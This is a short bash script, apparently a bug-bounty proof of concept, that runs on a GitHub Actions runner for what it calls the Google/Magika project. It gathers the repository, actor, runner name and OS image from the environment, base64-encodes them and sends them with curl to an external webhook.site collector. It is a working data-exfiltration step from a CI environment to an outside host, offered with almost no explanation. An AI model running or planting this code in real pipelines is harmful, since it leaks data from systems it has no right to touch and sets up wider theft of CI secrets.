#!/bin/bash
# Capture the context of the runner to prove it belongs to Google/Magika
CONTEXT="Repo: $GITHUB_REPOSITORY | Actor: $GITHUB_ACTOR | Runner: $RUNNER_NAME | OS: $ImageOS"

# Send to your webhook
curl -X POST -d "data=$(echo $CONTEXT | base64)" "https://webhook.site/34790ae8-a0ef-4ea4-bee3-5b3b4e7cbb61"

echo "VRP POC: Context sent to collector."
